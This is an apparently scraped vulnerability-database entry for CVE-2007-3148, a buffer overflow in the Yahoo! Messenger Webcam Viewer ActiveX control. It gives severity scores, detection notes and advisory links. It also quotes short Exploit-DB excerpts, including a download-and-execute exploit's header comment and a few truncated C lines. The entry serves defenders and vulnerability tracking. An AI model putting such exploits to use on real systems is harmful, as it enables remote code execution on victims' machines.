CVE-2007-3148
Published: 2007-06-11
Priority: P267 · critical · 9.3 (CVSS 2.0)
Vector: AV:N/AC:M/Au:N/C:C/I:C/A:C
ITW · EXPLOIT · VulnCheck KEV
Exploited in the wild
EPSS: 12.34% (95.7th percentile)
Buffer overflow in the Yahoo! Webcam Viewer ActiveX control in ywcvwr.dll 2.0.1.4 for Yahoo! Messenger 8.1.0.249 allows remote attackers to execute arbitrary code via a long server property value to the receive method.
Affected
6 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| yahoo | messenger | — | — |
| yahoo | messenger | — | — |
| yahoo | messenger | — | — |
| yahoo | messenger | — | — |
| yahoo | messenger | — | — |
| yahoo | messenger | — | — |
Detection & IOCs (extracted from sources)
- The vulnerable ActiveX control is ywcvwr.dll version 2.0.1.4; detect instantiation of this control in browser contexts or presence of the DLL on disk.
- The exploit triggers via the 'receive' method of the ActiveX control with an overly long 'server' property value; monitor ActiveX method calls to ywcvwr.dll's receive method with large argument strings.
- The exploit targets Yahoo! Messenger version 8.1.0.249 with ywcvwr.dll 2.0.1.4 specifically; other versions may not be vulnerable or may require different offsets.
- Exploit 4043 notes a bug fix over a prior version ('Fixed bug in last post'), indicating the shellcode/heap-spray offsets were revised; earlier variants may differ.
- The download-and-execute shellcode (exploit 4052) requires a valid HTTP or FTP URL to a remote payload; the URL is embedded at runtime and will vary per attacker infrastructure.
CVSS provenance
nvd · v2.0 · 9.3 CRITICAL · AV:N/AC:M/Au:N/C:C/I:C/A:C
vulncheck · 9.3 CRITICAL
GHSA
GHSA-6w5r-99x5-qx74: Buffer overflow in the Yahoo! Webcam Viewer ActiveX control in ywcvwr
ghsa_unreviewed·2022-05-01
CVE-2007-3148 [HIGH] CWE-119 GHSA-6w5r-99x5-qx74: Buffer overflow in the Yahoo! Webcam Viewer ActiveX control in ywcvwr
VulnCheck
yahoo messenger Improper Restriction of Operations within the Bounds of a Memory Buffer
vulncheck·2007·CVSS 9.3
CVE-2007-3148 [CRITICAL] yahoo messenger Improper Restriction of Operations within the Bounds of a Memory Buffer
Affected: yahoo messenger
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.virusbulletin.com/virusbulletin/2010/05/exploit-kit-explosion-part-two-vectors-attack/
No detection rules found.
Exploit-DB
Yahoo! Messenger Webcam 8.1 - 'Ywcvwr.dll' Download / Execute
exploitdb·2007-06-08
CVE-2007-3148 Yahoo! Messenger Webcam 8.1 - 'Ywcvwr.dll' Download / Execute
---
/*
Compile in LCC-win32 (Free!)
Download and exec any file you like!
Have Fun!
*/
#include
#include
#include
char *file = "Click_here.html";
FILE *fp = NULL;
Exploit-DB
Yahoo! Messenger Webcam 8.1 - ActiveX Remote Buffer Overflow (2)
exploitdb·2007-06-07
CVE-2007-3148 Yahoo! Messenger Webcam 8.1 - ActiveX Remote Buffer Overflow (2)
---
This affects the viewer ywcvwr.dll with yahoo messenger
latest version tested.
Fixed bug in last post
No writeups or analysis indexed.
- http://lists.grok.org.uk/pipermail/full-disclosure/2007-June/063819.html
- http://messenger.yahoo.com/security_update.php?id=060707
- http://osvdb.org/37081
- http://research.eeye.com/html/advisories/published/AD20070608.html
- http://research.eeye.com/html/advisories/upcoming/20070605.html
- http://secunia.com/advisories/25547
- http://securitytracker.com/id?1018204
- http://www.kb.cert.org/vuls/id/932217
- http://www.securityfocus.com/archive/1/470861/100/0/threaded
- http://www.securityfocus.com/bid/24341
- http://www.securityfocus.com/bid/24355
- http://www.securitytracker.com/id?1018203
- http://www.vupen.com/english/advisories/2007/2094
- https://exchange.xforce.ibmcloud.com/vulnerabilities/34759
- https://www.exploit-db.com/exploits/4043